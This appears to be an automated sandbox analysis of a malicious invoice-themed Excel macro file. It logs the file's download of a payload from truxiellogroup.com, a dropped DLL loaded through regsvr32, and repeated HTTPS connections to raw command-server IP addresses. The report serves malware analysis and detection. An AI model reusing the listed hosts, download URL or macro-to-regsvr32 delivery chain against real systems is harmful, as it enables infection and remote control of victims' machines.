HTTP traffic detected: GET /d0l359.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: truxiellogroup.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1182D45F.emf

Jump to behavior

Source: global traffic

Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comvw equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: truxiellogroup.com

Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241078237.0000000000236000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: DWWIN.EXE, 00000007.00000003.2239993090.00000000001B1000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245060695.0000000003835000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2381929162.0000000001CD0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382046788.00000000008F0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241857829.00000000022E0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65/f
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65/t
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385480217.00000000031AA000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://46.105.131.65:1512/yB
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233/qM
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/YB
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/aB
Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	String found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	String found in binary or memory: https://80.86.91.27/P
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/AB
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/IB
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49219
Source: unknown	Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49337
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49333
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 49297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49293
Source: unknown	Network traffic detected: HTTP traffic on port 49333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49329
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown	Network traffic detected: HTTP traffic on port 49219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49289
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49281
Source: unknown	Network traffic detected: HTTP traffic on port 49357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49398
Source: unknown	Network traffic detected: HTTP traffic on port 49289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49273
Source: unknown	Network traffic detected: HTTP traffic on port 49394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49390
Source: unknown	Network traffic detected: HTTP traffic on port 49341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49309
Source: unknown	Network traffic detected: HTTP traffic on port 49366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49305
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49301
Source: unknown	Network traffic detected: HTTP traffic on port 49269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49386
Source: unknown	Network traffic detected: HTTP traffic on port 49261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49382
Source: unknown	Network traffic detected: HTTP traffic on port 49378 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49378
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49374
Source: unknown	Network traffic detected: HTTP traffic on port 49249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49370
Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49245
Source: unknown	Network traffic detected: HTTP traffic on port 49305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49366
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49362
Source: unknown	Network traffic detected: HTTP traffic on port 49353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 49325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49357
Source: unknown	Network traffic detected: HTTP traffic on port 49398 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49353
Source: unknown	Network traffic detected: HTTP traffic on port 49285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 49317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 49362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49349

Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49269 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49281 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49305 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49329 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49333 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49353 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2

Source: C:\Windows\System32\DWWIN.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Jump to dropped file

System Summary:

Document contains an embedded VBA macro which may execute processes

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")			Name: pagesREviewsd
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")			Name: pagesREviewsd

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: INV2680371456-20210111889374.xlsm	Initial sample: CALL
Source: INV2680371456-20210111889374.xlsm	Initial sample: CALL
Source: INV2680371456-20210111889374.xlsm	Initial sample: CALL
Source: INV2680371456-20210111889374.xlsm	Initial sample: CALL

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\aymakjne.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0017B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,		4_2_0017B780
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0017BA14 NtSetInformationProcess,		4_2_0017BA14

